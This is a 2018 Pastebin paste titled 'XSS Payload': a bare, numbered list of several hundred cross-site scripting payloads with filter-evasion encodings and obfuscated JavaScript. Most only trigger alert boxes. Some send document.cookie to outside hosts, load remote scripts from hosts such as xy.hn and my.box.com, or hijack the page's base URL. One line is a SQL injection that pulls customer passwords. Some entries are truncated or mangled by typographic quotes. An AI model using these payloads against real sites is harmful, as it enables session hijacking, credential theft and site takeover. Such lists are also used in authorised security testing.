lordaung

XSS Payload

Sep 19th, 2018
4,080
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 499.05 KB | None | 0 0
  1. <%%%>
  2. >”’
  3. ![] + []
  4. ?=!?,?=!?,?=!+?,?=?+?
  5. ?=?[?[+?]+?[+?+[+?]]+?[?]+?[+?]+?[?]+?]
  6. ?=?[?]+?,?=?+?,?=?+?,?=+?,?=+?,?=?[?],?=?+[?]
  7. ?=?+?;?=?+?,?=?+?;?=[?]+?[?],?=?[+?]
  8. ?=[],?={}
  9. ?[?[?]+?[?]+?[?]+?[?]+?+?+?[?]+?[?]+?
  10. ?]=[!!?]+!?+?.?)[?+=?+?+?+?+?+?+
  11. ?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
  12. /?#&;:=”%<>@[\\]^`{|}
  13. /*-/*`/*\`/*’/*”/**/
  14. ‘>//\\,<’>”>”>”*”
  15. ‘“(){}[];
  16.  
  17. ”><! — 
  18. ([,?,,,,?]=””+{},[??,??,??,??,,???,???,???,,,???]=[!!?]+!?+?.?)[?+=?+???+???+??+??+??+?+??+?+??][?](???+???+??+
  19. ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?=?+?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
  20. ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?+=?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
  21. ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,
  22. ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!’’+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
  23. ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!’’
  24. )[?]+[?]+(?+?)[?])()
  25. +?[?]+?](?[?]+?[?]+?[?]+?+?+(?+?
  26. +$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
  27.  
  28. (!![]+[])[0]
  29. %00%00%00%00%00%00%00<script>alert(11)</script>
  30. %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
  31. 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al
  32. 00000010: 6572 7428 3129 0c3e 0a ert(1).>.
  33. &#0000060;
  34. &#0000060
  35. &#0000062;
  36. &#0000062
  37. 00000`${alert(1)}`
  38. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  39. &#000060;
  40. &#000060
  41. &#000062;
  42. &#000062
  43. %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
  44. &#00060;
  45. &#00060
  46. &#00062;
  47. &#00062
  48. %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
  49. &#0060;
  50. &#0060
  51. &#0062;
  52. &#0062
  53. 0%0d%0a%00<script src=//h4k.in>
  54. &#00;</form><input type&#61;”date” onfocus=”alert(1)”>
  55. &#00;</form><input type&#61;”date” onfocus=”confirm(1)”>
  56. <[00]script>alert(1)</[00]script>
  57. %00"><script>alert(1)</script>
  58. <%00/title>
  59. 0\%22))}catch(e){confirm(2)}//
  60. &#060;
  61. &#060
  62. &#062;
  63. &#062
  64. “})}%0A%09%09alert(197);%0A{({“”:”&
  65. %’});%0aalert(1);%20//
  66. %0aalert(1);/><script>///
  67. %0aalert(1);/”><script>///
  68. %0Aonload=”eval(name)”;>
  69. <%0ascript>alert(1);</script>
  70. %0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’; “></svg>
  71. 0\”autofocus/onfocus=alert(1) →<video/poster/ error=prompt(2)>”-confirm(3)-”
  72. 0\”autofocus/onfocus=alert(1) →<video/poster/onerror=prompt(2)>”-confirm(3)-”
  73. <%0bscript>alert(1);</script>
  74. {?????????????????????????????=0;?????????????????????????????()}catch(e){alert(e)}
  75. (0)[‘constructor’][‘constructor’](“\141\154\145\162\164(1)”)();
  76. 0..constructor.constructor`alert(1)```
  77. <%0Cscript>alert(1);</script>
  78. //%0D%0A%0d%0a//
  79. ;//%0da=eval;b=alert;a(b(10));//
  80. ‘;//%0da=eval;b=alert;a(b(9));//
  81. %0da=eval;b=alert;a(b(/d/.source));
  82. <! — */!’*/!>%0D<svg/onload=confirm`1`// — 
  83. <! — */!’*/!>%0D<svg/onload=confirm`1`//
  84. (0)”></img>
  85. 0=”>”<img src=’-alert(1)-’ onerror=”;alert(179);”>
  86. 0&q=’;alert(String.fromCharCode(88,83,83))//\’;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  87. 0?<script>Worker(“#”).onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
  88. ({$:#0=t,z:eval(String(#0#).replace(/@/g,))}).z//>
  89. \”><0x000123>
  90. [0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(12)</script>
  91. [0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>
  92. [0x09,0x0B,0x0C,0x20,0x3B]
  93. [[0xc0]u003cimg src=1 onerror=alert(/xss/) [0xc0]u003e
  94. [0xc0]u003cimg src=1 onerror=alert(/xss/) [0xc0]u003e
  95. ( ![] + [] )[1]
  96. (!![]+[])[1] +
  97. (![]+[])[1] +
  98. //[10,13,8232(utf-8),8233(utf-8)]alert(1)//
  99. &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
  100. (!![]+[])[1] + (!![]+[])[0]])(9)
  101. 11111';\u006F\u006E\u0065rror=\u0063onfirm; throw’1
  102. (1?(1?{a:1?””[1?”ev\a\l”:0](1?”\a\lert”:0):0}:0).a:0)[1?”\c\a\l\l”:0](content,1?”x\s\s”:0)
  103. {1+1,confirm(8)}
  104. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
  105. //1234567890123/0/?0=”>”<img src=’-alert(51)-’ onerror=”;alert(510);”>
  106. 123%81";alert(1);//
  107. 123[‘’+<_>ev</_>+<_>al</_>](‘’+<_>aler</_>+<_>t</_>+<_>(1)</_>);
  108. 12&<script>alert(123)</script>=123
  109. 1337in alert(1)
  110. 1337in?alert(1)
  111. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver
  112. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  113. (‘\141\154\145\162\164\50\61\51’)()
  114. ({})[$=’\143\157\156\163\164\162\165\143\164\157\162'][$](‘\141\154\145\162\164\50/ @0x6D6172696F /\51’)()
  115. ({})[$=’\143\157\156\163\164\162\165\143\164\157\162'][$](‘\141\154\145\162\164\50/ 12345 /\51’)()
  116. [][‘\146\151\154\164\145\162’][‘\143\157\156\163\164\162\165\143\164\157\162’]
  117. 14.rs/#alert(document.domain)
  118. \152\141\166\141\163\143\162\151\160\164\072alert(1)
  119. 1};a=eval;b=alert;a(b(14));//
  120. 1];a=eval;b=alert;a(b(17));//
  121. 1;a=eval;b=alert;a(b(/c/.source));
  122. 1<a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  123. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  124. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  125. 1…&alert(document.cookie)
  126. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
  127. 1,class extends[]/alert(1){}
  128. 1<comment onresize=alert(1) contenteditable>1
  129. 1/confirm(1)
  130. “1\”&confirm(1)\”3"
  131. ___=1?’ert(123)’:0,_=1?’al’:0,__=1?’ev’:0,1[__+_](_+___)
  132. [1].find(alert)
  133. 1script3document.vulnerable=true;1/script3
  134. 1" →</script><svg/onload=’;alert(0);’>
  135. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
  136. /1/[Symbol.replace](‘1’,alert)
  137. ~~)1(trela+tpircsavaj’.split(‘’).reverse().join(‘’).split(‘~’).join(String.fromCharCode(47)).split(‘+’).join(String.fromCharCode(58))).concat(‘
  138. 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
  139. (![]+[])[2] +
  140. >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
  141. >%22%27><img%20src%3d%22javascript:confirm(%27%20XSS%27)%22>’%uff1cscript%uff1econfirm(‘XSS’)%uff1c/script%uff1e’”>>”’’;! — “<XSS>=&{()}
  142. \%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}//
  143. %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E
  144. %22/%3E%3CBODY%20onload=��document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)��%3E
  145. %22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E
  146. %22/%3E%3CBODY%20onload=idocument.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)i%3E
  147. %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E
  148. %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
  149. %22%3E%3Cscript%3Ealert%28/atul/%29%3C/script%3E
  150. %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
  151. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  152. %22%3e%3cscript%3ealert(‘XSS’)%3c/script%3e
  153. %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
  154. %22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3E0x94(0x000123)%3C
  155. ‘%22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
  156. ‘%22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E
  157. %22;alert%28%27RVRSH3LL_XSS%29//
  158. \%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)//
  159. \%22;confirm(1);//
  160. 24185.43339120701.toString(36);
  161. 24185.43339120701.toString(36); (7.585899999991459e-10).toString(33).match(/[a-z]+/g)[0];
  162. %2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
  163. %2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E
  164. %2527%257Calert%2528%2527XSS%2527%2529%257C%2527
  165. %253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E
  166. %253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E
  167. %253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E
  168. %253cscript%253ealert(1)%253c/script%253e
  169. %253Cscript%253Ealert(1)%253C/script%253E
  170. %253cscript%253ealert(document.cookie)%253c/script%253e
  171. %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E
  172. %253Cscript%253Eprompt%28%29%253C%2Fscript%253E
  173. %253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
  174. %253script%253ealert(/Xss/)%253c/script%253e
  175. %253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e
  176. “%25prompt(9)%25”
  177. %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
  178. & => %26 , # => %23 , + => %2B
  179. %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
  180. %26%2397;lert(1)
  181. %26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B%0A
  182. ‘%26%26’javascript:alert%25281%2529//
  183. “%26%26prompt(9)%26%26”
  184. %26jsonp=alert(1);></script>
  185. %26lt%3bscript>
  186. %26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
  187. “%26prompt(9)%26”
  188. %27%22 — %3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
  189. <!%27/!”/!\%27/\”/ — !><Input/Type=Text%20AutoFocus%20*/;%20OnFocus=(confirm)(1)%20//>
  190. %27%3C/script%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E/
  191. %27|alert%28%27XSS%27%29|%27
  192. %2BACIAPgA8-script%2BAD4-alert%28/1/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
  193. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  194. %2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-
  195. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  196. ‘%2Balert(0x000123)%2B’
  197. %2Balert(0x000123)%2B’
  198. %2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
  199. 2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
  200. ❤ </3
  201. &#34;&#62;<h1/onmouseover=’\u0061lert(1)’>
  202. &#34;&#62;<h1/onmouseover=’\u0061lert(1)’>%00
  203. &#34;&#62;<svg><style>{-o-link-source&colon;’<body/onload=confirm(1)>’
  204. &#39;&#88;&#83;&#83;&#39;&#41;>
  205. /*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-msbehavior:url(#default#time2)
  206. %3C
  207. %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
  208. %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
  209. %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
  210. %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
  211. %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
  212. %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
  213. =”/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
  214. “/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
  215. ‘%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
  216. %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
  217. <%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C
  218. %3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
  219. %3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
  220. %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E
  221. %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E
  222. %3Cscript%0Baaa%3Ealert%281%29%3C/script%0Baaaa%3E
  223. %3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
  224. %3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
  225. %3Cscript%20src=/xss.js%3E%3C/script%3E%3Cbase%20href=//evil/
  226. 3Cscript%3Ealert(1)%3C%2Fscript%3E
  227. %3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
  228. %3Cscript%3Ealert(1)%3C/script%3E
  229. %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
  230. %3cscript%3ealert(document.cookie);%3c%2fscript%3e
  231. %3Cscript%3Ealert(document. domain);%3C/script%3E&
  232. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
  233. %3cscript%3ealert(“WXSS”);%3c/script%3e
  234. %3cscript%3ealert(‘XSS’)%3c/script%3e
  235. %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
  236. %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
  237. %3Cx onerror=prompt(131)
  238. %3Cx onxxx=alert(1)
  239. %3Cx onxxx=alert(1)
  240. %3E
  241. %3E%3Cbody%20onload=javascript:alert(1)%3E
  242. %3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;
  243. (![]+[])[4] +
  244. [4076*A]<img src=”x” alt=”[0x8F]” test=” onerror=confirm(1)//”>
  245. ‘’;!&#45;&#45;”<NeatHtmlReplace_XSS>=&{()}
  246. 500);alert(1);//
  247. 5.replace(/XSS/g,confirm)
  248. 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
  249. &#60;
  250. &#60
  251. &#62;
  252. &#62
  253. <%/%=%&#62<&#112/&#111&#110&#114&#101&#115&#105&#122&#101=&#97&#108&#101&#114&#116(1)//>
  254. 62<svg onload=alert(62)>
  255. <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = ‘(%2e%2a%3f)’%22)[%31]); </%73%63%72%69%70%74>
  256. \74svg o\156load=alert\5061\51>
  257. (7.585899999991459e-10).toString(33).match(/[a-z]+/g)[0];
  258. <%78 onerror=prompt(132)
  259. <%78 onxxx=1
  260. <%78 onxxx=1
  261. [84].find(alert)
  262. 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
  263. <a
  264. a=`
  265. <a”’%0A`= +%20>;test<a”’%0A`= +%20>?test<a”’%0A`= +%20>;#test<a”’%0A`= +%20>;
  266. <a”’%0A`= +%20>;test<a”’%0A`= +%20>?test<a”’%0A`= +%20>;&x=”><img src=x onerror=prompt(1);>#”><img src=x onerror=prompt(1);>test<a”’%0A`= +%20>;
  267. a=0||’ev’+’al’||0;b=0||’locatio’;b+=0||’n.h’+’ash.sub’||0;b+=0||’str(1)’;c=b[a];c(c(b))
  268. a=0||’ev’+’al’,b=0||location.hash,c=0||’sub’+’str’,1[a](b[c](1))
  269. “a”+(0,”l”)+”ert(1)”
  270. a=1;a=eval;b=alert;a(b(11));//
  271. a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.c haracterSet);//
  272. a%20onchange=alert(9)>
  273. <a&#32;href&#61;&#91;&#00;&#93;”&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;”>XYZ</a
  274. a=a%3D&b=+><img+src%3Da+onerror%3Dalert(9)//
  275. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
  276. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  277. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  278. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  279. a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
  280. {{a=”a”[“constructor”].prototype;a.charAt=a.trim;$eval(‘a”,alert(alert=1),”’)}}
  281. =a?a?><img/src=a?xa?onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>
  282. a=`${alert/*}`;
  283. a=`${alert`1`}`
  284. a;alert(1);//
  285. a=alert a(0)
  286. a=alert,a(1)
  287. A=alert;A(1)
  288. a=alert,a(83)
  289. a?aMaXscriptaMconfirm(1)aX/scriptaM
  290. “;a.b=c;//
  291. “;a[b]=c;//
  292. ‘abc(def)ghi(jkl)mno(pqr)abc(def)ghi ‘
  293. “‘`>ABC<div style=”font-family:’foo’*chr*x:expression(log(*num*));/*’;”>DEF
  294. “‘`>ABC<div style=”font-family:’foo*chr*;x:expression(log(*num*));/*’;”>DEF
  295. “‘`>ABC<div style=”font-family:’foo’\x3Bx:expression(javascript:alert(1);/*’;”>DEF
  296. “‘`>ABC<div style=”font-family:’foo’\x3Bx:expression(javascript:alert(1);/*’;”>DEF
  297. “‘`>ABC<div style=”font-family:’foo’\x7Dx:expression(javascript:alert(1);/*’;”>DEF
  298. “‘`>ABC<div style=”font-family:’foo’\x7Dx:expression(javascript:alert(1);/*’;”>DEF
  299. ABC<div style=”x:expression\x00(javascript:alert(1)”>DEF
  300. ABC<div style=”x:expression\x5C(javascript:alert(1)”>DEF
  301. ABC<div style=”x:exp\x00ression(javascript:alert(1)”>DEF
  302. ABC<div style=”x:exp\x5Cression(javascript:alert(1)”>DEF
  303. ABC<div style=”x:\x00expression(javascript:alert(1)”>DEF
  304. ABC<div style=”x:\x09expression(javascript:alert(1)”>DEF
  305. ABC<div style=”x:\x0Aexpression(javascript:alert(1)”>DEF
  306. ABC<div style=”x:\x0Bexpression(javascript:alert(1)”>DEF
  307. ABC<div style=”x:\x0Cexpression(javascript:alert(1)”>DEF
  308. ABC<div style=”x:\x0Dexpression(javascript:alert(1)”>DEF
  309. ABC<div style=”x:\x20expression(javascript:alert(1)”>DEF
  310. ABC<div style=”x\x3Aexpression(javascript:alert(1)”>DEF
  311. ABC<div style=”x:\xC2\xA0expression(javascript:alert(1)”>DEF
  312. ABC<div style=”x:\xE2\x80\x80expression(javascript:alert(1)”>DEF
  313. ABC<div style=”x:\xE2\x80\x81expression(javascript:alert(1)”>DEF
  314. ABC<div style=”x:\xE2\x80\x82expression(javascript:alert(1)”>DEF
  315. ABC<div style=”x:\xE2\x80\x83expression(javascript:alert(1)”>DEF
  316. ABC<div style=”x:\xE2\x80\x84expression(javascript:alert(1)”>DEF
  317. ABC<div style=”x:\xE2\x80\x85expression(javascript:alert(1)”>DEF
  318. ABC<div style=”x:\xE2\x80\x86expression(javascript:alert(1)”>DEF
  319. ABC<div style=”x:\xE2\x80\x87expression(javascript:alert(1)”>DEF
  320. ABC<div style=”x:\xE2\x80\x88expression(javascript:alert(1)”>DEF
  321. ABC<div style=”x:\xE2\x80\x89expression(javascript:alert(1)”>DEF
  322. ABC<div style=”x:\xE2\x80\x8Aexpression(javascript:alert(1)”>DEF
  323. ABC<div style=”x:\xE2\x80\x8Bexpression(javascript:alert(1)”>DEF
  324. ABC<div style=”x:\xE3\x80\x80expression(javascript:alert(1)”>DEF
  325. ABC<div style=”x:\xEF\xBB\xBFexpression(javascript:alert(1)”>DEF
  326. a{b:`function(){alert(1)}()`;}
  327. <AboutBoxText><![CDATA[<a href=javascript:alert(1337)>Click me</a>]]> </AboutBoxText>
  328. about://xss.cx
  329. accesskey=x onclick=alert(1) 1=
  330. “ accesskey=x onclick=alert(1) 1=’
